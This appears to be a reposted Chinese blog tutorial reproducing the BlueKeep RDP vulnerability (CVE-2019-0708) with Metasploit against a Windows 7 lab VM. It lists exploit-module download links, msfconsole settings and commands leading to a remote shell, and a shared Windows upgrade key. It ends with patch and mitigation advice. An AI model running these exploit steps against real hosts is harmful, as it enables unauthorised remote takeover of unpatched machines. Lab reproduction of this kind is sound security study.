CVE-2019-0708 RDP MSF漏洞利用


CVE-2019-0708 RDP MSF漏洞復現

漏洞環境

使用 VMware 安裝Windows7 X64 模擬受害機

Windows7 X64下載鏈接:鏈接: https://pan.baidu.com/s/1A_b2PCbzInKx3hMkUz1xUg 提取碼: fiwx 

 

EXP

kali msf 攻擊准備:

1,metasploit-framework, kali msf  需更新到最新版本,如果正常打開輸入:msfupdate 進行更新,如果啟動msf報錯,可以卸載重新安裝:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

2,MSF 下載 Reference 中的攻擊套件放置文件到msf的相應文件夾(如果已存在同名文件,直接覆蓋即可) 。

鏈接: https://pan.baidu.com/s/1m1N0RLBhLRTMLy56DFke-g 提取碼: kw7b

rdp.rb   ->   /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb   ->   /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb   ->   /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb   ->   /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

window7 X64 攻擊准備:

1,如果下載到的Win7 X64是家庭普通版,是需要升級到旗艦版或者專業版,因為家庭普通版是沒有遠程連接這個功能的。

 

點擊開始,找到Windows Anytime Upgrade

這里輸入密鑰:6K2KY-BFH24-PJW6W-9GK29-TMPWP

下一步 ,驗證密鑰,等待驗證密鑰。如果密鑰驗證成功,會出現請接受許可條款,如果密鑰驗證不成功,則下面的步驟不可用,那可以返回,重新在網上找升級密鑰,直至密鑰驗證成功。點我接受,升級系統大概花10分鍾的時間,聯網升級,在升級過程中,電腦會重啟數次,認真等待。

2,開啟3389端口,允許遠程桌面連接;修改高級共享設置,默認是關閉的;

啟動遠程桌面服務,默認是禁止的;

修改防火牆設置,增加一條允許連接tcp 3389端口的出站入站記錄;

這樣就可以開啟遠程連接了,一般是允許遠程桌面連接和啟動遠程桌面服務就可以了,如果仍然不行的話就把上面的准備全部操作一遍。

 

進行攻擊:

使用 msfconsole 進入 metasploit-framework

進入以后使用 reload_all 重新加載 0708rdp 利用模塊

使用 use exploit/windows/rdp/cve_2019_0708_bluekeep_rce 啟用 0708RDP 攻擊模塊

使用 show options 查看相關信息和設置

 

關鍵設置主要為 RHOSTS / RPORT / target

set RHOSTS 受害機IP設置受害機IP

set RPORT 受害機PORT設置受害機RDP端口號

set target ID數字(可選為0-4)設置受害機機器架構

使用的是VMware,那么 target 2 滿足條件

使用 exploit 開始攻擊,等待建立連接

建立連接以后,使用 shell 獲得shell,再使用 python 獲得交互式 shell 

完成攻擊,成功拿到受害者主機權限。

打完收工。

Reference

https://github.com/rapid7/metasploit-framework/pull/12283/files

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708

https://pan.baidu.com/s/1A_b2PCbzInKx3hMkUz1xUg 提取碼: fiwx 

https://pan.baidu.com/s/1m1N0RLBhLRTMLy56DFke-g 提取碼: kw7b

參考自清水師傅的文章(https://qiita.com/shimizukawasaki/items/024b296a4c9ae7c33961)

 

受影響Windows系統版本:
Windows 7
Windows Server 2008 R2
Windows Server 2008
Windows 2003
Windows XP

修復方法:微軟已經於2019年05月4日發布了漏洞補丁,請進行相關升級:https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-0708#ID0EWIAC
Windows XP 及Windows 2003可以在以下鏈接下載補丁:https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708

臨時解決方案
1、如暫時無法更新補丁,可以通過在系統上啟用網絡及身份認證(NLA)以暫時規避該漏洞影響。
2、在網絡外圍防火牆阻斷TCP端口3389的連接,或對相關服務器做訪問來源過濾,只允許可信IP連接。
3、禁用遠程桌面服務。
 
 
本文鏈接(https://www.cnblogs.com/Oran9e/p/11479575.html),轉載請注明。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM